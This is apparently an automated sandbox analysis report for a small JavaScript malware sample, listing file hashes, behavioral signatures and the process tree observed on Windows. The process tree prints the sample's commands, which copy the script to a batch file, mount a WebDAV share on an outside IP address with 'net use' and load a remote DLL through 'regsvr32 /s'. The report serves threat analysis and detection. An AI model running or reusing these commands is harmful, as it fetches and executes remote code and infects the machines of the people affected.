Analysis
-
max time kernel
121s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
10/07/2024, 01:40
Static task
static1
Behavioral task
behavioral1
Sample
2727240823238218669.js
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
2727240823238218669.js
Resource
win10v2004-20240709-en
General
-
Target
2727240823238218669.js
-
Size
5KB
-
MD5
f95dec38745edcbb9c3d22555d77c94a
-
SHA1
0934c767e1907110c81aa0fac8d809a967d4f4e7
-
SHA256
6547ae56e683d062433e3083d802a4504fb9e592894a6e2d75e4e4947a4efdd8
-
SHA512
eb825306f2b43feb22cd19f6f19bf4f306d705ac71870e2369173e607f64563f9573f16de756e817587e97092948982364f9cfcf3046fc0891ad49141281cabd
-
SSDEEP
96:xb/BBwzXIxcccQgZXIxcccRl9OYlvN7SKWN1Ft2B3+us2Eeep2B1ikV:pjwZP9vWl8B33xEPAB1ikV
Malware Config
Signatures
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2620 regsvr32.exe -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 2420 wrote to memory of 2688 2420 wscript.exe 31 PID 2420 wrote to memory of 2688 2420 wscript.exe 31 PID 2420 wrote to memory of 2688 2420 wscript.exe 31 PID 2688 wrote to memory of 2720 2688 cmd.exe 33 PID 2688 wrote to memory of 2720 2688 cmd.exe 33 PID 2688 wrote to memory of 2720 2688 cmd.exe 33 PID 2688 wrote to memory of 2620 2688 cmd.exe 34 PID 2688 wrote to memory of 2620 2688 cmd.exe 34 PID 2688 wrote to memory of 2620 2688 cmd.exe 34 PID 2688 wrote to memory of 2620 2688 cmd.exe 34 PID 2688 wrote to memory of 2620 2688 cmd.exe 34
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\2727240823238218669.js1⤵
- Suspicious use of WriteProcessMemory
PID:2420 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\2727240823238218669.js" "C:\Users\Admin\\flaldb.bat" && "C:\Users\Admin\\flaldb.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:2688 -
C:\Windows\system32\net.exenet use \\45.9.74.13@8888\DavWWWRoot\3⤵PID:2720
-
-
C:\Windows\system32\regsvr32.exeregsvr32 /s \\45.9.74.13@8888\DavWWWRoot\303.dll3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2620
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5KB
MD5f95dec38745edcbb9c3d22555d77c94a
SHA10934c767e1907110c81aa0fac8d809a967d4f4e7
SHA2566547ae56e683d062433e3083d802a4504fb9e592894a6e2d75e4e4947a4efdd8
SHA512eb825306f2b43feb22cd19f6f19bf4f306d705ac71870e2369173e607f64563f9573f16de756e817587e97092948982364f9cfcf3046fc0891ad49141281cabd